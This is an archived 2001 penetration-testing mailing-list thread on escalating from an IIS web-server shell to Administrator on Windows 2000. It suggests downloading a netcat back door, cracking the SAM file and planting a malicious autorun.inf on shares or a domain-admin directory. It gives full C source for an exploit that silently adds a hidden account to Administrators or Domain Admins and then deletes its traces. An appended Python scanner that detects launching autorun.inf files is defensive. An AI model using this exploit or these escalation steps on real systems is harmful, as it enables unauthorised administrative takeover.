Penetration Testing mailing list archives

Re: [PEN-TEST] Expand right under Win2K


From: "Nelson Brito (a.k.a. stderr)" <stderr () SEKURE ORG>
Date: Wed, 10 Jan 2001 13:59:44 -0200

Paul Cardon wrote:

Charlie Rhodes wrote:

We have a Win2K where we have access to a cmd.exe with the rights of the
web server and we would like to obtain administrator rights. Also we
don't have the rights to read the SAM files.
We tried the well-known methods under Win NT 4.0 (like breaknt.exe,
read from raw device) in vain.

Do you have network (ftp) access? Or floppy access?
http://www.bo2k.com should do the trick.  You'll probably want to configure
the server part off the machine, then load it on.


This is the second time this question has been asked on the list and
almost everybody misunderstands the problem.  Let me restate it:

Suppose a pen-tester has used the IIS Unicode vulnerability to download
a back door such as a netcat listener to the target Win2K server and now
has a remote cmd shell.  At this point the remote shell is running with
IUSR_<MACHINE> privilege since that is the privilege level that the
Unicode vulnerability provides.

Now, how does the pen-tester elevate privilege to Administrator?

Any software that is downloaded (tftp, ftp, whatever) through the remote
command shell will only run with IUSR_<MACHINE> privilege.  Why do
people think that downloading BO2K, netcat, or some such will magically
elevate privilege?  It doesn't.

The only things that are possible are:

1)  There is a known privilege escalation vulnerability that can be
exploited with local unprivileged access.  The attacker can download and
run that code to gain Administrator access.
You can use another Win2K || NT machine to execute programs, like:
1 - Copy a "hacked version" of autorun.inf + hacked program to another
Win2K || NT machine;
2 - Put the root directory that hosts autorun.inf in shared mode;
3 - On the IIS Unicode Traversal machine, mount the shared directory;
4 - Now you'll see the "hacked autorun.inf" executing arbitrary commands.

I think this will help you...

Another way to do this is:
1 - Find the PDC (if one exists) in the domain;
2 - Find the "mountable directory" for "Domain Admins";
3 - Put the "hacked autorun.inf" in this directory;
4 - Sit and relax while waiting for a member of "Domain Admins" to log on.

You could do this with a "Shell Folder" vulnerability, and others...


2)  Brute force attack against accounts with local Administrator
privilege.

You can crack the SAM file, because IUSR_<MACH> has permission to read
this file.


3)  Look for vulnerabilities in other systems that the web server can
talk to.  Some of those may expose Domain accounts with Administrator
privilege on the web server or other systems that are trusted by the web
server.

There are others but Win2K does limit some of the nicer possibilities
that existed with NT.

-paul

A source example of the "hacked autorun.inf" and the program looks like:
--- autorun.cpp
/****************************************************************************************
 * Author    : Nelson Brito                                                             *
 * E-mail    : nelson () secunet com br && stderr () sekure org                          *
 * URL       : http://stderr.sekure.org && http://www.secunet.de                         *
 * Date      : Belem, 9 December 2000.                                                   *
 * Published : Rio de Janeiro, 9 January 2001.                                           *
 ****************************************************************************************/

/****************************************************************************************
 * To exploit this vulnerability you will have to use your brain, because I am not      *
 * going to teach you how to use it; I am only publishing the code.                     *
 *                                                                                      *
 * Thanks to: Bruno Alvim(remorse), Andrea Goulart, Helge Fischer, Thiago(c0nd0r),      *
 *            Felipe(falcon), corb@sekure(what's up?), Nilson Brito(brother),           *
 *            Andre Silveira(phD), Charlene(mi amore) and Mom... =)                     *
 ****************************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <process.h>      /* The execl() function in VC++. */

FILE *fp;

int main(void){

        char *windir = getenv("WINDIR");              // Where is %SystemRoot%?
        const char *batch = "C:\\TEMP\\nelson.bat";   // Temporary batch file.

        if(!windir){ fprintf(stderr, "WINDIR not set\n"); exit(0); }

        /**********************************************************************************
         * Yes, I know, I could have used "NetUserAdd()" and "NetGroupAdd()", but I       *
         * thought it better to use a temporary batch file; the code is smaller.          *
         **********************************************************************************/
        if(!(fp = fopen(batch, "w"))){ perror("fopen"); exit(0); }

        fprintf(fp, "@echo off\n");
        fprintf(fp, "@%s\\system32\\net.exe user nelson secunet"
                    " /fullname:\"Nelson Brito from Security Networks AG / IBQN\""
                    " /comment:\"Penetration Test Account\" /add > nul\n", windir);

        /**********************************************************************************
         * Here you must define whether it will be used on a DC or a stand-alone machine. *
         **********************************************************************************/
        #ifdef _IS_A_PDC_
                fprintf(fp, "@%s\\system32\\net.exe group Administrators nelson /add > nul\n", windir);
                fprintf(fp, "@%s\\system32\\net.exe group \"Domain Admins\" nelson /add > nul\n", windir);
        #else
                fprintf(fp, "@%s\\system32\\net.exe localgroup Administrators nelson /add > nul\n", windir);
        #endif

        /**********************************************************************************
         * At the end, a message will be sent to the machine PITBULL, my machine. =)      *
         **********************************************************************************/
        fprintf(fp, "@%s\\system32\\net.exe send PITBULL \"Autorun Privilege Escalation Exploit Executed\"\n", windir);
        fprintf(fp, "@%s\\system32\\cmd.exe /c del %s\n", windir, batch);
        fclose(fp);

        execl(batch, batch, NULL);      // Run the temporary batch file.
        perror("execl");                // Execution error.

        return(0);
}

--- autorun.cpp

--- autorun.inf
[autorun]
open=autorun.exe
--- autorun.inf

PS: It works with PGPDisk, at mount time. When you mount the
PGPDisk, the system recognizes it as a mount point and then executes the
"hacked autorun.inf".

Nothing more,
--
Nelson Brito
Security Analyst && Penetration Tester
Security Networks AG / IBQN - http://www.secunet.de/
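As an added defensive example (not code from the original post or its author), the following Python scans a directory tree, such as a share mounted for review, for autorun.inf files whose [autorun] section launches a program, which is the artefact this thread describes; the sample files it creates are constructed.

```python
import configparser
import os
import tempfile

# [autorun] directives that make Explorer run a program on mount; these are the
# hallmark of the "hacked autorun.inf" technique described in the thread.
EXEC_KEYS = ("open", "shellexecute")


def launching_directives(path):
    """Return [(key, value)] for directives in [autorun] that execute a program."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read(path, encoding="latin-1")
    except configparser.Error:
        return []                      # unparseable file: nothing to report
    hits = []
    for section in cp.sections():
        if section.lower() != "autorun":
            continue
        for key, value in cp.items(section):
            # keys are lower-cased by configparser; shell\<verb>\command also executes
            if key in EXEC_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
                hits.append((key, value))
    return hits


def scan_tree(root):
    """Walk root (e.g. a mounted share) and map each launching autorun.inf to its directives."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() == "autorun.inf":
                full = os.path.join(dirpath, name)
                hits = launching_directives(full)
                if hits:
                    findings[full] = hits
    return findings


def demo():
    """Constructed sample layout: one launching autorun.inf (as in the post) and one benign."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "tools"))
    with open(os.path.join(root, "autorun.inf"), "w") as f:
        f.write("[autorun]\nopen=autorun.exe\n")              # constructed, mirrors the post
    with open(os.path.join(root, "tools", "autorun.inf"), "w") as f:
        f.write("[AutoRun]\nicon=setup.ico\nlabel=Tools\n")   # constructed, icon/label only
    return scan_tree(root)
```

Only the file that launches a program is reported; an autorun.inf that sets just an icon and label is left out.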

